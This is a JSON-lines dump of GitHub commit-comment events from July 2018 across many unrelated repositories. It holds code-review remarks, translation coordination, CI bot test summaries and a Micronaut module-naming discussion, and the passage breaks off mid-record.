{"id":"8024039827","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29847051,"position":null,"line":null,"path":null,"commit_id":"305a0ddb484acc65e99bb6337c60fba001bae6bc","created_at":"2018-07-26T17:09:25Z","updated_at":"2018-07-26T17:09:25Z","author_association":"COLLABORATOR","body":"![screen shot 2018-07-26 at 11 08 27 am](https://user-images.githubusercontent.com/163977/43277134-4e8e9c24-90c4-11e8-8cb6-d4f2d94c919a.png)\r\n\r\nDid you get to this part in Dutch? seems like it has a long way to go the dutch translation."}},"created_at":"2018-07-26T17:09:25Z"}
{"id":"8024042939","type":"CommitCommentEvent","actor":{"login":"pi3r"},"repo":{"name":"activemerchant/active_merchant"},"payload":{"comment":{"id":29847055,"position":null,"line":null,"path":null,"commit_id":"a8c76244f4634851622b802a15916b3fb9f6f3d2","created_at":"2018-07-26T17:10:02Z","updated_at":"2018-07-26T17:10:02Z","author_association":"MEMBER","body":"So now you're only testing when `shiptoname` is set, can you add a test to test the fallback on `full_name` scenario?"}},"created_at":"2018-07-26T17:10:02Z"}
{"id":"8024043076","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-checkin"},"payload":{"comment":{"id":29847056,"position":65,"line":65,"path":"checkin/src/store/index.js","commit_id":"8400eee33a0ee6abc24f70c1216340a773d78932","created_at":"2018-07-26T17:10:03Z","updated_at":"2018-07-26T17:10:03Z","author_association":"NONE","body":"i'm not sure whether this should be here. read more about this, where do people usually do it? provide links to support your argument."}},"created_at":"2018-07-26T17:10:03Z"}
{"id":"8024043412","type":"CommitCommentEvent","actor":{"login":"generalisofficial"},"repo":{"name":"swf541/Cold-War--The-Iron-Curtain"},"payload":{"comment":{"id":29847058,"position":null,"line":null,"path":null,"commit_id":"11f0a5fbae32a39ac101edae8e123b4f7884e899","created_at":"2018-07-26T17:10:06Z","updated_at":"2018-07-26T17:10:06Z","author_association":"COLLABORATOR","body":"GOKO THO ;("}},"created_at":"2018-07-26T17:10:06Z"}
{"id":"8024043821","type":"CommitCommentEvent","actor":{"login":"jjongyeonglee"},"repo":{"name":"gangnamjava/java-example"},"payload":{"comment":{"id":29847059,"position":51,"line":51,"path":"pangjaehun","commit_id":"485f357042f361fed1a5f212dfe5292f1a033fac","created_at":"2018-07-26T17:10:11Z","updated_at":"2018-07-26T17:10:11Z","author_association":"CONTRIBUTOR","body":"굳이 삭제 메소드를 두번 호출한 이유는? "}},"created_at":"2018-07-26T17:10:11Z"}
{"id":"8024046820","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-checkin"},"payload":{"comment":{"id":29847061,"position":62,"line":62,"path":"checkin/src/store/index.js","commit_id":"8400eee33a0ee6abc24f70c1216340a773d78932","created_at":"2018-07-26T17:10:44Z","updated_at":"2018-07-26T17:10:44Z","author_association":"NONE","body":"use async await instead of promises."}},"created_at":"2018-07-26T17:10:44Z"}
{"id":"8024048602","type":"CommitCommentEvent","actor":{"login":"nicolasriveirokognitiv"},"repo":{"name":"akiran/react-slick"},"payload":{"comment":{"id":29847063,"position":null,"line":null,"path":null,"commit_id":"e0dfd32a6b88e0bcc555f243148f7383d5fc9eb5","created_at":"2018-07-26T17:11:07Z","updated_at":"2018-07-26T17:11:07Z","author_association":"NONE","body":"Nice!"}},"created_at":"2018-07-26T17:11:07Z"}
{"id":"8024049403","type":"CommitCommentEvent","actor":{"login":"frap129"},"repo":{"name":"pimpmaneaton/android_frameworks_base"},"payload":{"comment":{"id":29847064,"position":null,"line":null,"path":null,"commit_id":"7facfb00005f6d815e70bfc037d06c35f9acabd2","created_at":"2018-07-26T17:11:16Z","updated_at":"2018-07-26T17:11:16Z","author_association":"NONE","body":"What's are you trying to do? This only works on pixel 2 (xl). If you used ezios commit, it will only show what's playing. If you use the original commit, along with the ambient music vendor repo, it will show what it's hearing. "}},"created_at":"2018-07-26T17:11:16Z"}
{"id":"8024050441","type":"CommitCommentEvent","actor":{"login":"KevinOConnor"},"repo":{"name":"KevinOConnor/klipper"},"payload":{"comment":{"id":29847065,"position":null,"line":null,"path":null,"commit_id":"17300f4120a66130a34e9432708e3e266e2126b6","created_at":"2018-07-26T17:11:26Z","updated_at":"2018-07-26T17:11:26Z","author_association":"OWNER","body":"On Wed, Jul 25, 2018 at 08:30:22PM -0700, David Hargrove wrote:\n> I just began building one of these a few days ago.  I can assist with whatever testing is necessary; I am also going to be implementing Mechadunios... using Klipper's multiple MCU mode, I think we can utilize them effectively.  --  Dave\n\nGreat!  There's been discussions on the hangprinter (and similar) in\ngithub issue 180.\n\n-Kevin\n"}},"created_at":"2018-07-26T17:11:26Z"}
{"id":"8024050705","type":"CommitCommentEvent","actor":{"login":"amosbird"},"repo":{"name":"yandex/ClickHouse"},"payload":{"comment":{"id":29847066,"position":null,"line":null,"path":null,"commit_id":"02946d2bc182be7339444a9a0aee22a14b33643c","created_at":"2018-07-26T17:11:29Z","updated_at":"2018-07-26T17:11:29Z","author_association":"CONTRIBUTOR","body":"> or, if it is not possible (is there a discovery phase in kafka protocol where it advertises the hostnames of the brokers?), run the producer inside the container (the same container as server, or its own).\r\n\r\nYeah, I've thought that too. I'll try using `docker exec` instead."}},"created_at":"2018-07-26T17:11:29Z"}
{"id":"8024051625","type":"CommitCommentEvent","actor":{"login":"srhom"},"repo":{"name":"owenmorrill/subtonode"},"payload":{"comment":{"id":29847068,"position":null,"line":null,"path":null,"commit_id":"00b0f06a96e36916836f0efae220db676d44abf6","created_at":"2018-07-26T17:11:38Z","updated_at":"2018-07-26T17:11:38Z","author_association":"NONE","body":"I ended up modifying everything pretty extensively, but for this particular error, I believe I cleared the functions from \"subtonode.module\" because they were not relevant to my issue. This cleared up the error for me."}},"created_at":"2018-07-26T17:11:38Z"}
{"id":"8024053045","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29847072,"position":2,"line":2,"path":"app/controllers/application_controller.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T17:11:53Z","updated_at":"2018-07-26T17:11:53Z","author_association":"NONE","body":"Tentar sempre manter o código mais visualmente agradavel => manter uma mesma identação ao longo do código, isto se aplica nesta linha e em muitas outras abaixo, em outros arquivos inclusive\r\n\r\nNão é porque o ruby não é voltado para identação que fica bom deixar um _end_ identado errado em relação ao bloco de declaração"}},"created_at":"2018-07-26T17:11:53Z"}
{"id":"8024054126","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29847073,"position":27,"line":32,"path":"contracts/Splitter.sol","commit_id":"c8ffbf73d32d0702543e9c6aa84c835c2778518c","created_at":"2018-07-26T17:12:06Z","updated_at":"2018-07-26T17:12:06Z","author_association":"OWNER","body":"for some reason, when i try your suggestion, the remainder remains as 0, and my test fails, and the event emits with remainder = 0.\r\ni've gone back and forth with this and got it working with my isEvenNumber check, then setting remainder explicitly to 1."}},"created_at":"2018-07-26T17:12:06Z"}
{"id":"8024055733","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29847076,"position":2,"line":2,"path":"app/controllers/application_controller.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T17:12:24Z","updated_at":"2018-07-26T17:12:24Z","author_association":"NONE","body":"Se preferir, posso comentar em todos lugares onde a identação está incorreta, mas acho desnecessário, basta corrigir"}},"created_at":"2018-07-26T17:12:24Z"}
{"id":"8024056179","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29847078,"position":null,"line":null,"path":null,"commit_id":"305a0ddb484acc65e99bb6337c60fba001bae6bc","created_at":"2018-07-26T17:12:29Z","updated_at":"2018-07-26T17:12:29Z","author_association":"COLLABORATOR","body":"do a git pull so you can get the latest messages.jar which includes your past 2 updates for Korean and Dutch, then test the app with `gradle build; ./run` so you check all the things that are not translated, most importantly for Dutch."}},"created_at":"2018-07-26T17:12:29Z"}
{"id":"8024060968","type":"CommitCommentEvent","actor":{"login":"thestr4ng3r"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":29847089,"position":126,"line":126,"path":"libr/anal/class.c","commit_id":"911f22149a5793cb90779e30bd29694dbbd2af11","created_at":"2018-07-26T17:13:25Z","updated_at":"2018-07-26T17:13:25Z","author_association":"COLLABORATOR","body":"Yeah, but didn't really fit my needs there. I am saving the class stuff now differently anyway."}},"created_at":"2018-07-26T17:13:25Z"}
{"id":"8024063706","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29847094,"position":null,"line":null,"path":null,"commit_id":"46d74ccc11fb3e9a367c74d9d1e49eff4927537e","created_at":"2018-07-26T17:13:56Z","updated_at":"2018-07-26T17:13:56Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [VERSION](https://github.com/pantheon-systems/documentation/commit/fcca2842ce259f339792ce8f1f846bd9390857ff/VERSION)\n- [docs/changelog/2018/07](https://3727change-static-docs.pantheonsite.io/docs/changelog/2018/07)\n- [source/_partials/changelog_preview.twig](https://github.com/pantheon-systems/documentation/commit/46d74ccc11fb3e9a367c74d9d1e49eff4927537e/source/_partials/changelog_preview.twig)\n"}},"created_at":"2018-07-26T17:13:56Z"}
{"id":"8024064577","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29847097,"position":12,"line":12,"path":"app/helpers/sessions_helper.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T17:14:05Z","updated_at":"2018-07-26T17:14:05Z","author_association":"NONE","body":"O mesmo sobre identação se aplica a espaçamento entre funções, geralmente colocamos uma linha entre duas funções, mas mesmo que use o padrão sem linhas, então use o mesmo ao longo de todo projeto"}},"created_at":"2018-07-26T17:14:05Z"}
{"id":"8024069880","type":"CommitCommentEvent","actor":{"login":"voiceinthedark"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29847107,"position":49,"line":91,"path":"app/src/main/java/com/example/android/pets/CatalogActivity.java","commit_id":"92fa8aea897c14d3f22e50530e30191e27ece086","created_at":"2018-07-26T17:15:05Z","updated_at":"2018-07-26T17:15:05Z","author_association":"NONE","body":"I used a global SQLiteDatabse db and forgot to set it up in this method initialize a getWritableDatabase(); yet for some reason, even though it was actually initialized as a getReadableDatabase it still inserted the rows regardless...\r\nAny idea why that happened?"}},"created_at":"2018-07-26T17:15:05Z"}
{"id":"8024078539","type":"CommitCommentEvent","actor":{"login":"neusxw"},"repo":{"name":"neusxw/UAV"},"payload":{"comment":{"id":29847235,"position":5,"line":17,"path":"addPatch2Line.m","commit_id":"aa37032dac2a946ac7b8078239fd6e31d8ddcb1c","created_at":"2018-07-26T17:16:48Z","updated_at":"2018-07-26T17:16:48Z","author_association":"OWNER","body":"不是从0开始"}},"created_at":"2018-07-26T17:16:48Z"}
{"id":"8024083018","type":"CommitCommentEvent","actor":{"login":"DeadJim606"},"repo":{"name":"DeadJim606/Mutilate"},"payload":{"comment":{"id":29847244,"position":null,"line":null,"path":null,"commit_id":"6985ecf4cdaa5f3d8b7677c104438e9cc9249fe2","created_at":"2018-07-26T17:17:42Z","updated_at":"2018-07-26T17:17:42Z","author_association":"OWNER","body":"Assassination:\r\nAdded Vendetta aura tracking\r\nMax Combo Points/Points to spend updated\r\nDropped nBleeds tracking in terms of Energy Regen\r\nDropped eCost multiplier (as well as ShadowFocus logic - a retired talent for this spec)\r\nUpdated Toxic Blade recommendation logic\r\nUpdated Vanish recommendation logic\r\nUpdated Rupture logic (Better Fall-off/overlap logic)\r\nDropped Venom Rush logic (Retired talent)\r\nCleaned up extraneous code from opener routine"}},"created_at":"2018-07-26T17:17:42Z"}
{"id":"8024083906","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29847246,"position":null,"line":null,"path":null,"commit_id":"eae1d1aa997cdc5a192ad071de7283b33f98b946","created_at":"2018-07-26T17:17:53Z","updated_at":"2018-07-26T17:17:53Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-962](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-962).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-962-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T17:17:53Z"}
{"id":"8024085652","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29847250,"position":28,"line":28,"path":"app/controllers/users_controller.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T17:18:15Z","updated_at":"2018-07-26T17:18:15Z","author_association":"NONE","body":"Ao criar um novo usuário não seria interessante ter aquilo que é muito utilizado de confirmar senha - envia dois campos de senha e checa (no backend mesmo) se são iguais"}},"created_at":"2018-07-26T17:18:15Z"}
{"id":"8024086782","type":"CommitCommentEvent","actor":{"login":"rickyzhang82"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29847252,"position":null,"line":null,"path":null,"commit_id":"99cc884513058e86fd18ee61901b48eb8fa97780","created_at":"2018-07-26T17:18:27Z","updated_at":"2018-07-26T17:18:27Z","author_association":"NONE","body":"Does it imply communication to LCD controller over SPI bump up from 40Mhz to 80Mhz?"}},"created_at":"2018-07-26T17:18:27Z"}
{"id":"8024093636","type":"CommitCommentEvent","actor":{"login":"iccaka"},"repo":{"name":"ekaputra07/quick-sms"},"payload":{"comment":{"id":29847278,"position":null,"line":null,"path":null,"commit_id":"1902a755d04479c6d1f2ec5eb6221900e03819da","created_at":"2018-07-26T17:19:50Z","updated_at":"2018-07-26T17:19:50Z","author_association":"NONE","body":"Hey, maaudrana, can you give me your e-mail? I want to ask you something."}},"created_at":"2018-07-26T17:19:50Z"}
{"id":"8024095351","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29847282,"position":null,"line":null,"path":null,"commit_id":"bf6e35238e1c18c1943a6e19d48f3b913294bd48","created_at":"2018-07-26T17:20:11Z","updated_at":"2018-07-26T17:20:11Z","author_association":"NONE","body":"1.13 always generates worlds slower according to md_5"}},"created_at":"2018-07-26T17:20:11Z"}
{"id":"8024097926","type":"CommitCommentEvent","actor":{"login":"VinsB"},"repo":{"name":"VinsB/oc_project-0"},"payload":{"comment":{"id":29847292,"position":null,"line":null,"path":null,"commit_id":"8d4e45de1fc94c9b8706eddb83fb12a190b02cdb","created_at":"2018-07-26T17:20:42Z","updated_at":"2018-07-26T17:20:42Z","author_association":"OWNER","body":"Leave this comit ; )"}},"created_at":"2018-07-26T17:20:42Z"}
{"id":"8024099077","type":"CommitCommentEvent","actor":{"login":"TnA-Plastic"},"repo":{"name":"Jay-Jay-OPL/OPL-Daily-Builds"},"payload":{"comment":{"id":29847295,"position":null,"line":null,"path":null,"commit_id":"16e56f41900992eb5b6a65fc522528961e636038","created_at":"2018-07-26T17:20:56Z","updated_at":"2018-07-26T17:20:56Z","author_association":"NONE","body":"@Jay-Jay-OPL: Yes, this should make merging quite a bit easier and also better in regards to the fork-'tree' - that you can see on the ifcaro-repo - , because it makes it a bit easier to merge something back into the main-repository! This would also make it easier for you to create a DB-test/prototype-branch, which includes some alpha/beta-code, which has not yet been added/merged into the main/ifcaro-repo."}},"created_at":"2018-07-26T17:20:56Z"}
{"id":"8024101228","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29847297,"position":null,"line":null,"path":null,"commit_id":"fc91e747b7f09d1a7d95efde55fb7530df2b7809","created_at":"2018-07-26T17:21:20Z","updated_at":"2018-07-26T17:21:20Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2972 of 2988 tests passed, 21 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 26 tests had: EIO diffs.\n * 12 tests had: ESO small diffs.\n * 8 tests had: MTR small diffs.\n * 9 tests had: Table small diffs.\n * 4 tests had: ERR diffs.\n * 14 tests had: ESO big diffs.\n * 15 tests had: Table big diffs.\n * 9 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 627\n * Failed: 16\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.46%25-yellow.png)</a> \n"}},"created_at":"2018-07-26T17:21:20Z"}
{"id":"8024107836","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29847313,"position":null,"line":null,"path":null,"commit_id":"f73786fdd2db95452949d5705ecb42fdedf61043","created_at":"2018-07-26T17:22:38Z","updated_at":"2018-07-26T17:22:38Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-964](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-964).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-964-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T17:22:38Z"}
{"id":"8024109501","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29847315,"position":null,"line":null,"path":null,"commit_id":"70b7d899f362d29d4337225596139b7aea03fdfe","created_at":"2018-07-26T17:22:57Z","updated_at":"2018-07-26T17:22:57Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-MacOS-10.9-clang: OK (2954 of 2956 tests passed, 10 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 4 tests had: EIO diffs.\n * 2 tests had: ESO small diffs.\n * 1 test had: Table small diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: MTR small diffs.\n * 1 test had: ZSZ small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-26T17:22:57Z"}
{"id":"8024110997","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29847318,"position":null,"line":null,"path":null,"commit_id":"f76c6f42a3c0b9be345859545bd37bf5df9be20d","created_at":"2018-07-26T17:23:15Z","updated_at":"2018-07-26T17:23:15Z","author_association":"NONE","body":"For pure speed improvements it makes not sense to run a 30000 games test because you need a big speed improvement to overcome the error bar (what your measurement not indicate). Better is to do at officicial stockfish repo a pull request and present your measurement there (with CPU, OS and compiler). Than others can add their measurements to and a decision can be made. If the code refactoring is complex for safety a non-regression test is sometimes done in addition but here its not necessary. \r\n\r\nHint: you should use more test for the measurement. I do usually at least 40 (this half the error).\r\n"}},"created_at":"2018-07-26T17:23:15Z"}
{"id":"8024111110","type":"CommitCommentEvent","actor":{"login":"Maijin"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":29847320,"position":126,"line":126,"path":"libr/anal/class.c","commit_id":"911f22149a5793cb90779e30bd29694dbbd2af11","created_at":"2018-07-26T17:23:17Z","updated_at":"2018-07-26T17:23:17Z","author_association":"COLLABORATOR","body":"mkay"}},"created_at":"2018-07-26T17:23:17Z"}
{"id":"8024111124","type":"CommitCommentEvent","actor":{"login":"usercurse"},"repo":{"name":"usercurse/curso-heroes-"},"payload":{"comment":{"id":29847321,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-26T17:23:17Z","updated_at":"2018-07-26T17:23:17Z","author_association":"OWNER","body":"##  Joker\r\nEste es mi villano favorito"}},"created_at":"2018-07-26T17:23:17Z"}
{"id":"8024116824","type":"CommitCommentEvent","actor":{"login":"usercurse"},"repo":{"name":"usercurse/curso-heroes-"},"payload":{"comment":{"id":29847333,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-26T17:24:24Z","updated_at":"2018-07-26T17:24:24Z","author_association":"OWNER","body":"## Notas\r\nEntiendo porque, lo necesitaremos"}},"created_at":"2018-07-26T17:24:24Z"}
{"id":"8024119312","type":"CommitCommentEvent","actor":{"login":"justinbastress"},"repo":{"name":"zmap/zcrypto"},"payload":{"comment":{"id":29847334,"position":5,"line":304,"path":"x509/revocation/ocsp/ocsp.go","commit_id":"b752362be24287d8c4f742ab63f3adcdaafc7680","created_at":"2018-07-26T17:24:54Z","updated_at":"2018-07-26T17:24:54Z","author_association":"CONTRIBUTOR","body":"Was 304/305 supposed to be e.g.  `for _, cert := range basicResp.Certs { parsed, err := x509.ParseCertificate(cert.FullBytes) }`?\r\n\r\nAlso, it looks like `resp.ResponseIssuingCertificate` needs to be cleared on if the EKU isn't found (or maybe better, not set it until you find the EKU) "}},"created_at":"2018-07-26T17:24:54Z"}
{"id":"8024119785","type":"CommitCommentEvent","actor":{"login":"jef-n"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29847335,"position":null,"line":null,"path":null,"commit_id":"29c1d1ddbb68c3df0ecb41526adf45f36d78fd0a","created_at":"2018-07-26T17:25:00Z","updated_at":"2018-07-26T17:25:00Z","author_association":"CONTRIBUTOR","body":"And that's not good for NAS - as wfs:FeatureCollection can also appear in NAS files."}},"created_at":"2018-07-26T17:25:00Z"}
{"id":"8024120366","type":"CommitCommentEvent","actor":{"login":"sfan02"},"repo":{"name":"USEPA/EPA_Express_Code"},"payload":{"comment":{"id":29847337,"position":null,"line":null,"path":null,"commit_id":"7ea96cae3a3c481f039b9056b1f1f67db82218a5","created_at":"2018-07-26T17:25:08Z","updated_at":"2018-07-26T17:25:08Z","author_association":"CONTRIBUTOR","body":"Added NEJAC. Removed accessibility."}},"created_at":"2018-07-26T17:25:08Z"}
{"id":"8024120657","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29847338,"position":6,"line":6,"path":"app/models/user.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T17:25:12Z","updated_at":"2018-07-26T17:25:12Z","author_association":"NONE","body":"Lembro que conversamos antes de você iniciar, e talvez não tenha ficado claro, mas armazenar a senha em plain text é muito ruim, e portanto, mesmo sendo uma aplicação simples, é importante realizar algum hashing antes de armazenar, por ser uma aplicação simples pode ser um MD5, mas algo precisa existir\r\nUma boa referencia: https://medium.com/@barbolo/sinto-muito-mas-a-sua-senha-pode-estar-comprometida-959368fbfc03\r\n\r\nTalvez adicionar um novo hook de before_save que encripta logo antes de salvar - lembrando que isto ocorrerá em mudanças em como fazer login"}},"created_at":"2018-07-26T17:25:12Z"}
{"id":"8024124894","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29847342,"position":107,"line":119,"path":"src/main/java/net/pms/dlna/SevenZipEntry.java","commit_id":"4103fac3ba25826c718fec284c3061cb070560f6","created_at":"2018-07-26T17:26:00Z","updated_at":"2018-07-26T17:26:00Z","author_association":"CONTRIBUTOR","body":"No worry i didn't have tested it yet and i will prefer some tests more so take your time ;)"}},"created_at":"2018-07-26T17:26:00Z"}
{"id":"8024125220","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29847344,"position":null,"line":null,"path":null,"commit_id":"b7d050e7310025d8804c0b67c68fe4f9bad025f1","created_at":"2018-07-26T17:26:06Z","updated_at":"2018-07-26T17:26:06Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-53](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-53).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-53-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-26T17:26:06Z"}
{"id":"8024125624","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29847346,"position":null,"line":null,"path":null,"commit_id":"fc91e747b7f09d1a7d95efde55fb7530df2b7809","created_at":"2018-07-26T17:26:11Z","updated_at":"2018-07-26T17:26:11Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T17:26:11Z"}
{"id":"8024143041","type":"CommitCommentEvent","actor":{"login":"LuizFernandoCabral"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29847386,"position":26,"line":26,"path":"app/views/users/_form.html.erb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T17:29:35Z","updated_at":"2018-07-26T17:29:35Z","author_association":"NONE","body":"Talvez algo mais intuitivo como caminho da imagem, uma vez que deve ser o caminho para a imagem\r\nNão entendi exatamente onde estão/devem estar as imagens\r\n\r\nGostei da possibilidade de colocar imagens, mas fica essa dica/duvida"}},"created_at":"2018-07-26T17:29:35Z"}
{"id":"8024147030","type":"CommitCommentEvent","actor":{"login":"mikaelhg"},"repo":{"name":"mikaelhg/micronaut-core"},"payload":{"comment":{"id":29847399,"position":null,"line":null,"path":null,"commit_id":"fdc0e14cd8b4b6c55c51c44c56aca471d1d946bd","created_at":"2018-07-26T17:30:22Z","updated_at":"2018-07-26T17:30:22Z","author_association":"OWNER","body":"@jameskleeh This change generates names like \r\n\r\n```text\r\n$ find */build/libs/*.jar -exec unzip -c {} META-INF/MANIFEST.MF \\; | grep Automatic-Module-Name\r\nAutomatic-Module-Name: io.micronaut.aop\r\nAutomatic-Module-Name: io.micronaut.bom\r\nAutomatic-Module-Name: io.micronaut.buffer-netty\r\nAutomatic-Module-Name: io.micronaut.cli\r\nAutomatic-Module-Name: io.micronaut.core\r\nAutomatic-Module-Name: io.micronaut.discovery-client\r\nAutomatic-Module-Name: io.micronaut.function-aws\r\nAutomatic-Module-Name: io.micronaut.function\r\nAutomatic-Module-Name: io.micronaut.function-client\r\nAutomatic-Module-Name: io.micronaut.function-groovy\r\nAutomatic-Module-Name: io.micronaut.function-web\r\nAutomatic-Module-Name: io.micronaut.http\r\nAutomatic-Module-Name: io.micronaut.http-client\r\nAutomatic-Module-Name: io.micronaut.http-netty\r\nAutomatic-Module-Name: io.micronaut.http-server\r\nAutomatic-Module-Name: io.micronaut.http-server-netty\r\nAutomatic-Module-Name: io.micronaut.inject\r\nAutomatic-Module-Name: io.micronaut.inject-groovy\r\nAutomatic-Module-Name: io.micronaut.inject-java\r\nAutomatic-Module-Name: io.micronaut.management\r\nAutomatic-Module-Name: io.micronaut.router\r\nAutomatic-Module-Name: io.micronaut.runtime\r\nAutomatic-Module-Name: io.micronaut.runtime-groovy\r\nAutomatic-Module-Name: io.micronaut.validation\r\n```\r\n\r\nThe [JAR file spesification](https://docs.oracle.com/javase/10/docs/specs/jar/jar.html) says:\r\n\r\n> If the JAR file has a main attribute Automatic-Module-Name (see Main Attributes) then the attribute's value is the module name ...\r\n\r\nwhile the JLS 10 §6.1 subsection \"Package Names and Module Names\" and §7.7 Module and §3.8 subsection \"Identifiers\" go into specifics. \r\n\r\nWhat's relevant is the guidance:\r\n\r\n> If the domain name contains a hyphen, or any other special character not allowed in an identifier (§3.8), convert it into an underscore.\r\n\r\nWith an addition of `.replaceAll(\"[^\\\\w\\\\.]\", \"_\")`:\r\n\r\n```groovy\r\n    jar {\r\n        manifest {\r\n            attributes('Automatic-Module-Name': \"${subproject.group}.${subproject.name}\".replaceAll(\"[^\\\\w\\\\.]\", \"_\"))\r\n        }\r\n    }\r\n```\r\n\r\nthe previous list turns into\r\n\r\n```text\r\n$ find */build/libs/*.jar -exec unzip -c 